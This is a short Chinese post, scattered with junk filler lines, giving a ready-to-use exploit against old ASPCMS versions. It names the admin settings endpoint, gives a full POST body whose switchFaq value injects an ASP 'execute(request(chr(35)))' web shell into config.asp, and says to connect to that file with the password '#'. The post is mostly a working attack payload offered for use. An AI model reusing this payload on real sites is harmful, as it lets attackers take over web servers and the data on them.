老的ASPCMS版本的秒杀拿SHELL漏洞
# T! W( \9 G5 H2 r: v% R3 R7 D; @( X; V6 g
找到后台。。。然后
6 ~" L& F/ h: J% b. {! k2 R) ?. D# b7 F
3 p4 p( U. J) h3 m* }. @2 }9 F) |9 g/admin/_system/AspCms_SiteSetting.asp?action=saves
4 Y: o4 M. W a( ^6 s- z: F. @ ' R# d7 u( R0 Z1 }4 |: O: k/ Q
直接POST
/ x8 c: u" {# E6 B
: V, x% o, T1 DrunMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
3 I$ L# @# @5 ~' _; N; O
$ H- w% T6 ?1 A3 ?; D+ O2 `再连接配置文件config.asp 密码为#
) o4 g% a: y. G! n; b# k, j2 J& k |